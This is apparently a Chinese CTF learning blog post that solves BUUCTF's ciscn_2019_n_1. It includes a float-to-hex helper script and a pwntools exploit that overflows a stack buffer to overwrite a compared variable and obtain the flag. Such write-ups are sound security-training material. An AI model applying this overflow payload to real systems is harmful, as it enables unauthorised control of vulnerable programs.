pwn学习(4)BUUCTF-ciscn_2019_n_1(浮点数转十六进制脚本积累)

checksec一下

IDA打开,如果满足的条件达成,就可以get flag

找到栈溢出漏洞,输入可以覆盖到v2

将代码11.28125在内存中的十六进制表示出来,

浮点数转十六进制代码如下:

复制代码
import struct

def float_to_hex(f):
    return hex(struct.unpack('<I',struct.pack('<f',f))[0])
print(float_to_hex(11.28125))
#output(0x41348000)

exp:

复制代码
from pwn import *

p=remote('node4.buuoj.cn',25860)

payload=b'a'*(0x30-0x4)+p32(0x41348000)
p.sendline(payload)

p.interactive()

运行出来的结果:

flag{8a5e8279-51a2-4b3b-8959-4d3f9b19227f}
总结:

脚本积累:浮点数转十六进制代码

相关推荐
寒月小酒8 小时前
第三章 索引构建(2-all -in-rag学习)
学习
天国梦8 小时前
中学生居家英语听力训练深度解析:从核心痛点到AI赋能的全链路方案
人工智能·学习
胡渠洋12 小时前
postman学习
学习·测试工具·postman
Amazing_Cacao14 小时前
CFCA精品可可产区风土解析(美洲):无情打破风味堆叠假象,建立时间轴上的层次动态阅读系统
学习
六点_dn14 小时前
Linux学习笔记-shell运算符
linux·笔记·学习
其实防守也摸鱼14 小时前
渗透--损坏的对象级别鉴权漏洞(Broken Object Level Authorization, BOLA)
大数据·网络·数据库·学习·tcp/ip·安全·安全威胁分析
念雨思15 小时前
信用卡权益对比:基于HarmonyOS + ArkTS的AI智能金融助手开发实践
人工智能·学习·华为·金融·harmonyos·鸿蒙
铅笔侠_小龙虾15 小时前
Rust 学习(2)-变量、常量与 shadowing
学习·算法·rust
it小生010115 小时前
从底层思维到高效行动,顶尖人才进阶核心修炼指南
学习·学习方法
恣逍信点15 小时前
《凌微经》通俗解读——哲学第一因
学习·职场和发展·创业创新·学习方法·业界资讯·交友·哲学